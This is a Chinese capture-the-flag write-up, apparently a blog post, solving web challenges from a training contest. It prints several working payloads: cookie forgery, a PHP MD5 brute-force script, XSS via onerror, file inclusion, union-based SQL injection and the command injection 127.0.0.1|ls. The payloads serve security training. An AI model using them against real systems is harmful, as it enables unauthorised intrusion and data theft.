合天赛前指导ctf


没技术含量的wp,我就不写了……

一、简单问答

一开始的时候还是看见有不少人评论这道题,不过就是点多了点,注意一点就可以了

1、火狐firebug改几个值和标签

倒数五、六行

2、把题目答案写上

q1 2016 q2 lol q3 22 true

3、抓包改数据

4、提交得flag

flag{W3ll_d0n3}

二、后台后台后台

cookie中的member内容改为Admin经过b6加密后的值,因为现在的值是normal

三、php是最好的语言

http://byd.dropsec.xyz/2016/07/21/%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%92%8CMD5%E7%88%86%E7%A0%B4%E8%84%9A%E6%9C%AC/

四、忘记密码

1、点击几次页面后发现,密码都是名字+三位数字,写个脚本爆破下,就好了

<?php

for($a=100;$a<1000;$a++){

$b='slash'.$a;

$c=md5($b);

$file='md5list.txt';

//file_put_contents ($file,$a."\r\n", FILE_APPEND);

file_put_contents ($file,$c."\r\n", FILE_APPEND);

}

?>

2、得到MD5值,经过burpsite的功能Intruder,爆破

load字典

点击start attack,开始爆破

看到624行,length不同,flag在这

flag{n1ce_te4m_n1ce_Rock}

五、简单的js

1、源码,看到有一段 js

2、解析后为<iframe height=0 width=0 src="./fl0a.php">

3、当前fl0a.php,显示$flag

4、cookie中有$flag C00k1els60SecU5e

六、php是门松散的预言

看到源码,意思为parse_str,把查询的字符串解析到变量中

构造payload ?hetian=he=abcd

七、XSS

onerror报错,弹窗

x' onerror=alert(document.domain)

flag D0Gum6Ntd0M11n

八、简单的文件包含

1、http://218.76.35.75:20126/index.php?page=/flag

2、源码 <!-- flag: 62a72cb2f3d5e7fc0284da9f21e66c9f.php-->

九、简单的验证

这个和第五个一样是跑脚本的

大致是100-999的三位数,把999当做变量爆破。别忘了把user改为admin

十、注入那么简单

1、测试

键入guest,测试有没有sql注入,单引号测试,闭合查询语句。

?name=guset’ --+

2、查有几个表

order by 4 报错,有三个表

3.找flag

题目提示猜表,发现information_schema被过滤,只能猜表,1,2,3都能当做显示位,

构造payload: ?name=guest' union select flag,2,3 from flag--+

十一、好简单的题目

1.回想这个题目确实在iscc中做过,这个还是做出来了

挺简单的键入127.0.0.1|ls,执行管道符后面的命令,只是iscc的是dir,这个题目说是dir溢出,确实有点坑,出现目录,访问得到flag

后面的题目由于某些原因没做,就这样吧^O^

优质内容筛选与推荐>>
1、ftp读取图片并转Base64
2、十分钟弄懂:数据结构与算法之美 - 时间和空间复杂度
3、043_MySQL 索引原理 与 慢查询优化
4、时间复杂度
5、30-Python文件拷贝


长按二维码向我转账

受苹果公司新规定影响,微信 iOS 版的赞赏功能被关闭,可通过二维码转账支持公众号。

    阅读
    好看
    已推荐到看一看
    你的朋友可以在“发现”-“看一看”看到你认为好看的文章。
    已取消,“好看”想法已同步删除
    已推荐到看一看 和朋友分享想法
    最多200字,当前共 发送

    已发送

    朋友将在看一看看到

    确定
    分享你的想法...
    取消

    分享想法到看一看

    确定
    最多200字,当前共

    发送中

    网络异常,请稍后重试

    微信扫一扫
    关注该公众号